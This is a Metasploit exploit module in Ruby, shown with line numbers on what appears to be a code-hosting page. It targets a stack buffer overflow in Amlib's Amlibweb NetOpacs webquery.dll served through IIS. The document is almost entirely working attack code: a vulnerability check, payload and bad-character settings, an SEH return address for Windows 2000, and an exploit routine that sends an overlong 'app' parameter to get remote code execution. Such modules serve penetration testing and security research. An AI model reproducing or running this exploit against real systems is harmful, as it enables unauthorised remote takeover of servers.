Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = NormalRanking
8

9
  include Msf::Exploit::Remote::Tcp
10
  include Msf::Exploit::Remote::Seh
11

12
  def initialize(info = {})
13
    super(update_info(info,
14
      'Name'         => 'Amlibweb NetOpacs webquery.dll Stack Buffer Overflow',
15
      'Description'  => %q{
16
          This module exploits a stack buffer overflow in Amlib's Amlibweb
17
        Library Management System (NetOpacs). The webquery.dll
18
        API is available through IIS requests. By specifying
19
        an overly long string to the 'app' parameter, SeH can be
20
        reliably overwritten allowing for arbitrary remote code execution.
21
        In addition, it is possible to overwrite EIP by specifying
22
        an arbitrary parameter name with an '=' terminator.
23
      },
24
      'Author'       => [ 'aushack' ],
25
      'Arch'         => [ ARCH_X86 ],
26
      'License'      => MSF_LICENSE,
27
      'References'   =>
28
        [
29
          [ 'OSVDB', '66814' ],
30
          [ 'BID', '42293' ],
31
          [ 'URL', 'http://www.aushack.com/advisories/' ],
32
        ],
33
      'Privileged'		=> true,
34
      'DefaultOptions'	=>
35
        {
36
          'EXITFUNC'	=> 'thread',
37
          'AllowWin32SEH' => true
38
        },
39
      'Payload'		=>
40
        {
41
          #'Space'			=> 600,
42
          'BadChars' 		=> "\x00\x0a\x0d\x20%=?\x2f\x5c\x3a\x3d\@;!$",
43
          'EncoderType'		=> Msf::Encoder::Type::AlphanumMixed,
44
          'DisableNops'  		=>  'True',
45
          'StackAdjustment' 	=> -3500,
46
        },
47
      'Platform' => ['win'],
48
      'Targets'  =>
49
        [
50
          # aushack - Tested OK 20100803 w2k IIS5
51
          [ 'Windows 2000 Pro All - English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll - 'dll?app={buff}' for SeH IIS5
52
          # [ 'Windows 2003 Server All - English', { 'Ret' => 0x44434241 } ], # todo: 'dll?{buff}=' call edi for EIP in IIS6 w3wp.exe, 120 byte limit, ASCII only.
53
        ],
54
      'DisclosureDate' => '2010-08-03', #0day
55
      'DefaultTarget' => 0))
56

57
    register_options(
58
      [
59
        Opt::RPORT(80),
60
      ])
61
  end
62

63
  def check
64
    connect
65

66
    rand = Rex::Text.rand_text_alpha(10)
67

68
    sock.put("GET /amlibweb/webquery.dll?#{rand}= HTTP/1.0\r\n\r\n")
69
    res = sock.get_once
70
    disconnect
71

72
    if (res.to_s =~ /<H1>BAD REQUEST<\/H1><P>Your client sent a request that this server didn't understand.<br>Request:\s(\w+)/)
73
      if ($1 == rand)
74
        return Exploit::CheckCode::Vulnerable
75
      end
76
    end
77
    Exploit::CheckCode::Safe
78
  end
79

80
  def exploit
81
    connect
82
    seh = generate_seh_payload(target.ret)
83

84
    buffer = Rex::Text.rand_text_alphanumeric(3028) + seh
85
    sploit = "GET /amlibweb/webquery.dll?app="  + buffer + " HTTP/1.0\r\n"
86
    sock.put(sploit + "\r\n\r\n")
87

88
    handler
89
    disconnect
90
  end
91
end
92

93